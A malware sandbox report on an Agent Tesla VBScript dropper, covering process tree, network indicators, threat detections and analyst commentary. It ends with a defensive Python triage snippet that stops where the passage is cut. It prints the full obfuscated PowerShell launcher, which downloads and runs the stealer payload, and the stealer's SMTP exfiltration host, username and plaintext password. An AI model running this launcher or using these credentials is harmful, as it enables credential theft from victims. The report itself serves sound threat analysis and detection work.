File name: 8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs

Full analysis: https://app.any.run/tasks/a4bd0fad-7846-4629-836a-3eb7570d803d
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about its victims' actions by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where the malware is sold.

Analysis date: March 19, 2024, 08:52:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
evasion
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5: C76A93BC5DB1B5A8F1E064AB0E51A4D0
SHA1: D9BC68197C03634E12AD62F01C078EB1BC9722BB
SHA256: 8DFC4DA6CDDBE96A8EEE81460A0352846A686AE31B567742F4F7E19C0A778C46
SSDEEP: 3072:sP4yENVBkYr4LhpVXpKnupn8kH3DPbkhZi3eNRMpWOuMvmOfyYqygQXUqIZm+:sP4yENVOY0NpVXpK68kH3DPbkhZi3eND

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Actions looks like stealing of personal data

      • wab.exe (PID: 5672)
    • Steals credentials from Web Browsers

      • wab.exe (PID: 5672)
    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 5672)
    • Scans artifacts that could help determine the target

      • wab.exe (PID: 5672)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2532)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)
    • Evaluates numerical expressions in cmd (potential data obfuscation)

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 2260)
    • Reads security settings of Internet Explorer

      • wab.exe (PID: 5672)
    • Checks Windows Trust Settings

      • wab.exe (PID: 5672)
    • Checks for external IP

      • wab.exe (PID: 5672)
    • Connects to SMTP port

      • wab.exe (PID: 5672)
  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2532)
      • powershell.exe (PID: 1068)
    • Checks supported languages

      • wab.exe (PID: 5672)
    • Reads the computer name

      • wab.exe (PID: 5672)
    • Checks proxy server information

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)
    • Reads the machine GUID from the registry

      • wab.exe (PID: 5672)
    • Reads the software policy settings

      • wab.exe (PID: 5672)
      • slui.exe (PID: 1404)
    • Creates files or folders in the user directory

      • wab.exe (PID: 5672)
    • Reads Environment values

      • wab.exe (PID: 5672)
    • Reads Microsoft Office registry keys

      • wab.exe (PID: 5672)

AgentTesla

(PID) Process: (5672) wab.exe
Protocol: smtp
Host: mail.ardsmmm.com
Port: 587
Username: info@ardsmmm.com
Password: Ard2015**
Total processes: 134
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process tree, reconstructed from the parent-process column of the process table below. The sandbox tags only wab.exe (#AGENTTESLA); every other node carries no signature of its own. The page names each parent by image only, so the split of children between the two PowerShell instances follows image bitness (the SysWOW64 cmd.exe and the 32-bit wab.exe sit under the 32-bit PowerShell):

explorer.exe
  wscript.exe (PID 2532)
    powershell.exe (PID 1068, System32, 64-bit)
      conhost.exe (PID 4076; which PowerShell instance spawned it is not recorded)
      cmd.exe (PID 6044) /c set /A 115^^0
      powershell.exe (PID 2260, SysWOW64, 32-bit)
        cmd.exe (PID 6680) /c set /A 115^^0
        wab.exe (PID 5672) #AGENTTESLA
svchost.exe
  slui.exe (PID 1404)

Process information

Columns: PID, CMD (command line), Path, Parent process. The original table runs these fields together without separators; for the two PowerShell rows the command line is the full obfuscated launcher script.
1068"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Spermagonia sknhedsaabenbaringens Eftermiddagsforestillinger Manipulatory Forureningsbegrebene #>;$everwho=(cmd /c set /A 115^^0);Function Elskerinder ([String]$Programmel){$everwho=[char][int]$everwho;$Tilskudsregelensnvaliditets=$everwho+'ubstring';$Misterming=8;$Nettovgtenes=opholdsomraadet($Programmel);For($Tilskudsregelens=7; $Tilskudsregelens -lt $Nettovgtenes; $Tilskudsregelens+=$Misterming){$Chutists=$Programmel.$Tilskudsregelensnvaliditets.Invoke($Tilskudsregelens, 1);$Simosaurus=$Simosaurus+$Chutists;}$Simosaurus;}function Pitbird ($Pawnor){. ($Oceanologer) ($Pawnor);}function opholdsomraadet ([String]$isopogonous){$Ingenirgerningerne=$isopogonous.Length-1;$Ingenirgerningerne;}$Glacon=Elskerinder 'Uddr geT LgeundrWo,dsycaUdgift,nDentninsRetsp.ifBorteske PanayarAmb,tior.quilibiDigekronAspsteugNond ce ';$Registreringspligter=Elskerinder 'Unme,eshKofusket LignintOdontoipEncinalsHyp.rtr: Disc n/S.marbe/AutoerodVa iolarMicrophi .rydnivInos,oaeRadevor.SubjpongC tholioSub.erroWasteingIndsbnilnamaq.aeCommont.H,rmafrcDistin oHor eummProst.t/Konfek,uarmlngdcScaurie?TranspleVersatix AktieppControvoEsse.serH.ubitst,aknemm=Na.tehidStrychno,appendwOutcre.n FrdigblNonsensoNo emcoaDuoersrdSofacyk&Thinglii S,skatdshopocr=Flaadde1Diddest0AftrdrirJavanesxIdea ios MomiolHBeklageG.ameablyR imondlIn.estmM Exil.n5OrdreekXAktionrj scendedPlac.an8 nnestlGProsodu5ConcussrIshmaelEamorfeiZ UnchemOStip laUPreapprCUd,mmebEregenerrChuggertLeptomo3 LatchltBlokfunZbearpawbRigse.baDebattryAmtsraawOswegoa ';$Oceanologer=Elskerinder 'AsieerfisaltnineUnlingexK.adran ';$Kollaborationers19=Elskerinder 'Superbe$fangedegMissionlTollento Delectb Parabea Flag.il Afrens:VioloneWReallnsi CineplnHjree,sd ApplicsPentanduStudievrHjerterfSynneuse Disponn Kynde,dPensi,neRent,besmisvist1Ba,ales8Skuffem7Halteri Wanting=Fejlmar 
Sk,ldflSInterc.tcounteraSt,eetwrUnwatertRebutta-FlbetssBNonclimiDistingtInvokedsNonradiTStileemrpredestaStumtjenTimefulsPegefinfHvdettee chesterDrab,ma Oldem,-PolytekS PowderoMustineuWeaponsrAarsta.cUnrul eeNationa Ddsstra$SkibstmRSvalegaeTro ersgPo rgaei FingersHedeblgtD lettarfossi,ie aderasr Tegnefi AntirenMonroligGeneralsHerrernpRadonurl remailimopboargPo.phyrt FranskeKume.ierDissert Lidseev-UninvigDaffricae S.bnatsPostcomtWhitewoiUln geun udfrdiaGrapholt Axt,eeiLoutishoE.hvervn Unwebb Lirkep$SalgsdiDVarmeler Inembrv Indstro Regl rgMagtedetSa.gsmae Dop,ngrCrumbiee Flnse.rRetsmed ';Pitbird (Elskerinder 'metodis$Tinta lgVidenskl Fyld.goJoukerybfritureaOverpr.lTribute: AdderiD Scle trDiarrsrv BaltisoMidsommgPlimraatProtoleeAendrinr Nab,breKleenexrTempusf=Sjappeg$SkopudseBroid,rnblo.forvGi arti: StoremaDedicatpcystinup KnappedPartikaaShireestRototilaHelbred ') ;Pitbird (Elskerinder 'OchringISkolarsmPhilosopSifonsfoIversenrSwordgrtenkemnd- NoumenMBirlerjoStrengedAvowabluelfenbelToyscyteApotele Forba.rBTrisylliAfmnstrtKerne.es SucceeTVvninggrCpusanta Fregnen Hallo,s FractafAtomaffepat,uljrPeritom ') ;$Drvogterer=$Drvogterer+'\Mannersome.Jas' ;Pitbird (Elskerinder 'Depreda$Plattelg Te,raslFoozlero U,ocenbInderk a Ma skslmagneti:EarstonK.ommunao.antamkmVaregldmTo,ngleaCapsulinAntechadFadgedmoSlibrigtafsondryIntuitipuni,luseDysodi,n,ymbolisgarialf=Ampulla(SkatteiTFoeltaieforblstsForblomt Hesper-ReshocePvic,neuaSulphurtfosso.ihNimurta Withers$HerlufmD .woundr ormaldvStiletho Artelsgvelsespt TravaleUpte.rsrTandemmeG.untyerS umarb)chimney ') ;while (-not $Kommandotypens) {Pitbird (Elskerinder 'Ka,ksteIdis endf Outv c Amst,up( Idiose$ let anWLek.ikaiAmary,ln Skue pd AphthissentimeuDekadenrMaanedafKnawelseKrak.lsnForbi dd LovligeUudsl.ts Overra1,ppleti8Bluede,7Reumati. 
EnergiJAsselfto NulstibRoycesiSNewspaptMillimeaDrift,gtFabul,reO lsdrm Metrosa-ProfesseMilevidqRetrans Hjhuset$KapsmbaG HydrarlBrnehavaNetvrkscFiksersoAvancemn He,ago)Ko.cent observa{Unfreq SGo,elintMakrop.aDumb,ourNightsptHistori-FreudiaSStrm,evl Hy.roleMillia,e Tel.nepPulingl Hematom1 Arbejd}Prelatie CerouslKapunersGo.lieseexonera{UsurperSBobadiltunassura Udbld rAdiposetHum ede- Kvld rS PythaglTetrammesuasiveeBreddespStandar Frilgge1Sterlet;PinkeyeP MarkariOpvoksetCerningbd sartiiProconfrLaeserudUnringi olsmnd$U ortalKTaljereoSmaavasl EligiblRetninga ordkrib SonsieoSprightrNeighboaUnpaupet RakeryiMacr,pooTeknok nAnesthaeVarmeslr.toikersP.oprie1Ak.ionr9Befordr}instruc ');Pitbird (Elskerinder 'Sprngfa$Husblasg ruktoslPolletao ,ruppebAngorasa PoloidlInven i:FordrinKFindelnoKampkunmGnostikmPreacheaVerbessnKongruedSlerundoImprovit.rbejdsyVig liepusingsieMikr,sknP nplegsguddoms=Enchodo( shellsT karyateInfractsBurgonet Sali y- illionPSquibcraaandendtAflvninhLu inou Vivisek$KnbjninDlurifakrHaabenevKnubango QuadrugUndersktdemursceKodedekrR,foundeUnfraterSelvb.d)Te krat ') ;}Pitbird (Elskerinder 'Demo.al$Rabatg gPodophtlturetb,oGltmercbCavespiaSurreptlDybgang:soveposTT.eomaniWyat,naseudialysBudgetoeProctodnSpindehdGulspureNationa G.atem=Fiske i S etlaGReimposeBesaan,t.hilier-Ba.tardCSpans,roUnoterenShutin,tPredevoeIncremengoofingtmor idi Tronflg$UteroloDBunin hr,rnumrevudstdnioKellysag Grimplt StranseAarstalrOmstni,ePa,riotr Diver ');Pitbird (Elskerinder ' Transs$Op.endigSenatsml ToxogloForblffb SmitstaDooziealOverpro: FasedeBIndertrl TjeneseCurwhibpPlastikhReprimeabredererDeputataInca oc2Baadvrf5Stjrten Hammers=Croupin Seedsme[.vulstiSRddeligyHanebjlsAcharyatLserbr.e Af,ropm Septen.An.amliCFiskehaoP,tagonnCha icovMyoglobeOpdrtterParoxyttNeph od]foroege: inflat: S agteF P.ecedrUnindigoA.ticarmSympatiBDansantaAccelersEfterfleFuruncu6Interpr4 CampinSTriasfot Solaarr BegraviDrk,rmsn Teatreg.olumes( Tudeho$ObrogatTTolvtaliKuarsyns Fl,wsmsTjretscestfrontn Ento odDartleseTetrar 
)Trrelse ');Pitbird (Elskerinder 'Tidsste$ BlattagUpalleylBesvrlioProctopbClasm taP.rtmanlTrouble:PlacardS Cherylk Taga,ayUd.eligdKonkur.eUndigitv PensioiFungivonUan,kuedVoluptuu.ugteneeRestindrpap rus Indel k=Sniffle Ka,itt[ coolamSSikkerhyHoneysssdyppelstIn.hsteeSsk,ndem Resul .M.ngfolTRosenshe De,ertxDressertsmaikra.Nulls,iEAkt.tykn Re,entcDeratizo paasked unctioi Flexibnsammensg,djamen]Afsone.:R.mdisk: PaaligAEnarme.SPrein,rCTimet.rIKen,emrIV lpici.Prosc.lGUdslusnesongishtNonvenaSleverintse.rsskrVerdensiLiteratnBehandlg Dentil(Landska$NemmedeBGedesbylAfhaarieGrisedepLystbaah .chervaAnvenderLetfordaWhitest2Spidser5Samment)Auxamyl ');Pitbird (Elskerinder ' archit$Pileat,gE yoreblPo ychroTankninbKonomiba monochlSismoth:SpisestkStedsbiostandarlFljlsble BombesrAlba itaf.lkeuneTunnelmpGigantoi AlkylodJobskabe Ghettom Somme iRumdumhsUnde.si=Haerene$Tilsta SUntermik.ippopoyBortadodVa,rdieeLserforvTrip asiAktuelln peccabds.angstuRylenbaeHyperadr degnes. NonsilsLeaventuElegancbMadonnasBeruthitMendelsrTaprobaiO egasgnFugtdangOverexc(breadle3trenche3 Scrayf2 ornbls9 Fabrik1 Beewee9legacyk,Sous,he3 Plai e0Afgasni7Fohnsb.6Viscosi9Extrava) immigr ');Pitbird $koleraepidemis;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 1404
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
PID: 2260
CMD: "C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated launcher script as PID 1068 above, character for character; the 64-bit instance (PID 1068, which the "Starts POWERSHELL.EXE" indicator attributes it to) re-runs the script in the 32-bit PowerShell.
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 2532
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\8dfc4da6cddbe96a8eee81460a0352846a686ae31b567742f4f7e19c0a778c46.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4076
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5672
CMD: "C:\Program Files (x86)\windows mail\wab.exe"
Path: C:\Program Files (x86)\Windows Mail\wab.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
PID: 6044
CMD: "C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID: 6680
CMD: "C:\WINDOWS\system32\cmd.exe" /c set /A 115^^0
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events: 17 735
Read events: 17 688
Write events: 47
Delete events: 0

Modification events

All ten recorded writes target HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:

(PID) Process | Name | Value
(2532) wscript.exe | ProxyBypass | 1
(2532) wscript.exe | IntranetName | 1
(2532) wscript.exe | UNCAsIntranet | 1
(2532) wscript.exe | AutoDetect | 0
(1068) powershell.exe | ProxyBypass | 1
(1068) powershell.exe | IntranetName | 1
(1068) powershell.exe | UNCAsIntranet | 1
(1068) powershell.exe | AutoDetect | 0
(2260) powershell.exe | ProxyBypass | 1
(2260) powershell.exe | IntranetName | 1

These four ZoneMap values are the defaults Windows writes when a process first initialises the WinINet zone map; all three script hosts here produce the same set, and benign reports show it just as often, so it is not a malware-specific indicator and there is no persistence write in this list.
Executable files: 0
Suspicious files: 7
Text files: 5
Unknown types: 3

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ciayleg2.f4h.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | der | AC89A852C2AAA3D389B2D2DD312AD367 | 0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45
2260 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | C76555487F3760099709FD7487BFB259 | AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | der | DBA737766CAA750561A7D1EF422724CB | 5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D | der | A6384E23EBEA2B95082022A9EAA0F346 | 2865568586BAFF0C8C404940257D5FC586E495A267C169F875E3D22325B15A9C
2260 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xgleqfvy.sbo.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c43hbwvk.kqy.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D | binary | F2B6A4BEBF5E9F4DBD46D3A5CA1CF395 | 605DA6BEAF229D3D1BED31B726706A151FCD44C6A9EA8817E46874294F877764
1068 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_muibtvx4.lvd.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5672 | wab.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277D | der | 07D62BA8CD29FBF8A6F1E4201594CE29 | 24398D01735E1A2C5AEC70AB2CC64D5DC8C87D495EBFC055524BC237DEE32834

None of these is the payload. The four __PSScriptPolicyTest_* files share one hash because they are the fixed probe PowerShell writes on start-up to test whether AppLocker or WDAC script enforcement applies, and the CryptnetUrlCache entries are cached certificate-revocation responses matching the OCSP requests listed under HTTP requests. The BITS download itself (destined for the %APPDATA% path built in the launcher, with the '\Mannersome.Jas' suffix visible on the PID 1068 command line) does not appear in this list.
HTTP(S) requests: 9
TCP/UDP connections: 38
DNS requests: 21
Threats: 4

HTTP requests

PID | Process | Method | HTTP code | IP | URL | Type | Size (CN and reputation are "unknown" for every row)
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | binary | 471 b
1528 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | (type not recorded) | 313 b
4480 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | binary | 471 b
6592 | SIHClient.exe | GET | 200 | 2.17.245.133:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | binary | 409 b
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D | binary | 1.41 Kb
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso | binary | 472 b
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | binary | 724 b
5672 | wab.exe | GET | 200 | 142.250.185.227:80 | http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D | binary | 471 b
5672 | wab.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | text | 6 b

Only the last row is the stealer's own request, and it is the one that fires three of the four network threats below: it asks ip-api.com for just the hosting field, i.e. whether the egress IP belongs to a hosting or datacentre provider, a check commonly used to recognise sandboxes and analysis VMs before exfiltration starts. The ocsp.pki.goog rows are revocation checks of a Google-issued certificate chain performed by wab.exe; the DigiCert and Microsoft rows come from Windows background processes.

Connections

Only 10 of the 38 TCP/UDP connections are reproduced on this page.

PID | Process | IP | Domain | ASN | CN | Reputation
4828 | svchost.exe | 239.255.255.250:1900 | (SSDP multicast, no domain) | unknown
6140 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3996 | svchost.exe | 20.190.159.64:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1280 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3996 | svchost.exe | 40.126.31.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
6544 | svchost.exe | 216.58.212.142:443 | drive.google.com | GOOGLE | US | whitelisted
6544 | svchost.exe | 142.250.186.129:443 | drive.usercontent.google.com | GOOGLE | US | whitelisted
3996 | svchost.exe | 40.126.31.67:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1528 | backgroundTaskHost.exe | 88.221.92.190:443 | www.bing.com | Akamai International B.V. | NL | unknown

The drive.google.com and drive.usercontent.google.com sessions are attributed to svchost.exe (PID 6544) rather than to either powershell.exe because the launcher fetches its payload through BITS (Import-Module BitsTransfer once the script's literals are decoded), and the BITS service performs the transfer from inside its service host. Filtering svchost.exe out of network telemetry as "system noise" therefore hides the download; pivot on the DNS answers and on which process wrote the downloaded file instead. The SMTP session to mail.ardsmmm.com:587 from the extracted configuration is among the connections not shown here; the Threats section records it.

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
  • 20.190.159.68
  • 40.126.31.67
  • 20.190.159.71
  • 40.126.31.73
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
drive.google.com
  • 216.58.212.142
shared
drive.usercontent.google.com
  • 142.250.186.129
unknown
www.bing.com
  • 88.221.92.190
  • 88.221.92.189
  • 88.221.92.134
  • 88.221.92.193
  • 88.221.92.132
  • 88.221.92.137
  • 88.221.92.136
  • 88.221.92.191
  • 88.221.92.192
whitelisted
arc.msn.com
  • 20.103.156.88
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 2.17.245.133
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID | Process | Class | Message
5672 | wab.exe | Potential Corporate Privacy Violation | AV POLICY Internal Host Retrieving External IP Address (ip-api. com)
5672 | wab.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com
5672 | wab.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api
5672 | wab.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via SMTP
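The process tree and the wab.exe network rows are what a detection engineer would turn into rules. The following is an added example, not part of the ANY.RUN report: a small triage pass in Python over process-creation and connection records constructed from this page. Parent PIDs are assumed (the page records only the parent image name), the obfuscated launcher bodies and one OCSP path are abbreviated, and INJECTION_HOSTS extends the single wab.exe seen here to other signed Microsoft binaries that are used the same way.

```python
"""Behavioural triage over the process tree and network rows of this report.

Added example, not part of the ANY.RUN report.  PROCS and NETS are
constructed from the page's process table, HTTP table and Threats section.
Assumptions: the parent PIDs (the page records only the parent image
name), the launcher bodies abbreviated to "...", and INJECTION_HOSTS,
which extends the one binary seen here (wab.exe) to other signed Microsoft
binaries commonly used as a host for an injected .NET stealer.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class Net:
    pid: int
    dst: str              # destination host name or IP
    port: int
    http_path: str = ""   # empty for non-HTTP connections


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
INJECTION_HOSTS = {"wab.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
                   "installutil.exe", "aspnet_compiler.exe", "caspol.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
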